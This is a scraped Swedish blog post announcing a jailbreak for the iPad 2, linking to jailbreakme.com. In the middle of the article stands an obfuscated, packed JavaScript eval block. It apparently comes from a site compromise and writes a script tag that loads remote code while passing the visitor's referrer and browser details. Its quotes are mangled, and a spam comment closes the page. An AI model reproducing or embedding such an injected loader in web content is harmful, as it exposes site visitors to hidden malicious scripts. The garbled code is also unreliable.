Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Nu är iPad 2 jailbreakad

Nu är iPad 2 jailbreakad
Sebastian

Många har väntat länge, men nu är den här. För första gången går nu iPad 2 att låsa upp via jailbreak.

Endast några dagar har gått sedan det läcktes ut att en jailbreak nu finns tillgänglig för iPad 2. Dem har även släppt den officiellt och det är bara att gå in på länken nedan för att jailbreaka din maskin.

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khkzr|var|u0026u|referrer|tsakr||js|php’.split(’|’),0,{}))
info:
www.jailbreakme.com

Comments

  1. browse classified ads